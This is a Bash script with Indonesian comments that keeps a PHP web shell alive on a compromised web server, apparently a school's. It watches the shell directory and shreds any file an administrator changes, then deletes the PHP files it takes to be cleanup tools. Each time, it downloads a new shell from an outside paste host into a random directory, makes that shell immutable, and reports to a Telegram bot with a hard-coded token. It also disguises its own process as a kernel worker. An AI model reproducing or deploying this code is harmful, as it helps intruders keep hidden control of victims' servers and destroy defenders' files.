#!/bin/bash # Konfigurasi WEB_SHELL_DIR="/home/sekolahb/public_html/" # Direktori webshell utama BACKUP_SHELL="https://raw.zeverix.com/raw/untitled-719" # Lokasi backup shell TELEGRAM_BOT_TOKEN="7765041082:AAGhlbXBsa4qDiAKbVOSmtZ50Gw45-TcVK8" # Token Telegram Bot TELEGRAM_CHAT_ID="1345261884" # Chat ID Telegram # Fungsi kirim notifikasi ke Telegram send_telegram() { local message="$1" timeout 3 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \ -d "chat_id=$TELEGRAM_CHAT_ID" \ -d "text=$message" > /dev/null 2>&1 } # Fungsi deploy ulang shell di direktori acak yang sudah ada deploy_shell() { # Dapatkan daftar direktori yang sudah ada di /var/www/html/ (kecuali direktori sistem) local existing_dirs=($(find /var/www/html -maxdepth 1 -type d ! -name "html" ! -name "cgi-bin" ! -name "error" ! -name "icons" 2>/dev/null | shuf)) # Pilih direktori acak dari daftar local random_dir="${existing_dirs[0]}" # Jika tidak ada direktori yang cocok, gunakan direktori default if [ -z "$random_dir" ]; then random_dir="/var/www/html" fi # Generate nama file shell acak local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php local new_shell_path="$random_dir/$shell_name" # Download shell dari URL curl -s -o "$new_shell_path" "$BACKUP_SHELL" chmod 400 "$new_shell_path" if [ "$(id -u)" -eq 0 ]; then chattr +i "$new_shell_path" 2>/dev/null fi send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path" echo "$new_shell_path" } # Fungsi hapus file berbahaya delete_intruder() { local target="$1" rm -f "$target" if [ -f "$target" ]; then shred -fuz "$target" 2>/dev/null fi } # Fungsi deteksi dan hapus balik PHP attacker detect_and_delete_php_attacker() { local php_processes=$(pgrep -f "php" | head -10) local attacker_found="" for pid in $php_processes; do local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null) local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ') if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then attacker_found="$php_file" break fi if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then attacker_found="$php_file" break fi done if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then delete_intruder "$attacker_found" send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found" echo "$attacker_found" fi } # Main loop dengan penyamaran proses exec -a "[kworker]" bash -c ' # Buat direktori target jika belum ada mkdir -p "$WEB_SHELL_DIR" # Monitor direktori inotifywait -m -r -e modify,move,delete,attrib "$WEB_SHELL_DIR" --format "%w%f %e" 2>/dev/null | while read file event do [[ -d "$file" ]] && continue # Hapus file yang diotak-atik delete_intruder "$file" # Deteksi dan hapus balik PHP attacker attacker_file=$(detect_and_delete_php_attacker) # Deploy shell baru di direktori acak yang sudah ada new_shell=$(deploy_shell) # Kirim notifikasi lengkap if [ -n "$attacker_file" ]; then send_telegram "🚨 PHP ATTACKER DETECTED & DELETED! File: $file Event: $event Attacker: $attacker_file New Shell: $new_shell ✅Mendeteksi file PHP yang dipakai untuk menghapus. ✅Menghapus balik file PHP tersebut secara otomatis. ✅Mengirim notifikasi ke bot Telegram Anda dengan detail ancamannya. Prinsipnya simpel: Siapa berani hapus, langsung hilang duluan!🖕" else send_telegram "🚨 ALERT! File: $file | Event: $event | New Shell: $new_shell" fi done ' &